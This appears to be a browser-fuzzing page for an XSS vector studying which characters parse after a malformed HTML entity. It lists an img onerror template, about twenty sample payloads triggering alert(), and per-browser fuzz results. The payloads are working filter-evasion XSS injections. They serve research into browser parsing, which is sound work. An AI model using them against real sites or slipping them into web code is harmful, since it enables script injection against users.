Characters allowed after malformed entities
31
31
31This vector shows what characters are allowed after a malformed names entity.
Created by: hackvertor
Created on: Monday, July 1, 2024 at 9:26:08 PM
Updated on: Wednesday, March 12, 2025 at 1:11:12 PM
Vector type: XSS
Vector charset: UTF-8
Template used:
<img src=data: onerror="1&$[chr]log($[i])">
Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...
Sample payloads
<img src=data: onerror="1&-alert(45)">
<img src=data: onerror="1&
alert(10)">
<img src=data: onerror="1& alert(8201)">
<img src=data: onerror="1& alert(8192)">
<img src=data: onerror="1& alert(8195)">
<img src=data: onerror="1& alert(8199)">
<img src=data: onerror="1& alert(9)">
<img src=data: onerror="1& alert(8200)">
<img src=data: onerror="1& alert(8196)">
<img src=data: onerror="1& alert(32)">
<img src=data: onerror="1&
alert(11)">
<img src=data: onerror="1& alert(5760)">
<img src=data: onerror="1& alert(8198)">
<img src=data: onerror="1&&alert(38)">
<img src=data: onerror="1& alert(8239)">
<img src=data: onerror="1& alert(160)">
<img src=data: onerror="1& alert(8202)">
<img src=data: onerror="1&alert(65279)">
<img src=data: onerror="1&~alert(126)">
<img src=data: onerror="1&
alert(12)">
Fuzz results
Safari 17.5 mobile iOS 17.5.1
Updated
Mon Jul 01 2024
Found 31 results
Loading...
Chrome 126.0.0.0 desktop macOS 10.15.7
Updated
Tue Jul 02 2024
Found 31 results
Loading...
Firefox 127.0 desktop macOS 10.15
Updated
Tue Jul 02 2024
Found 31 results
Loading...
Safari 18.0 desktop macOS 10.15.7
Updated
Tue Jul 02 2024
Found 31 results
Loading...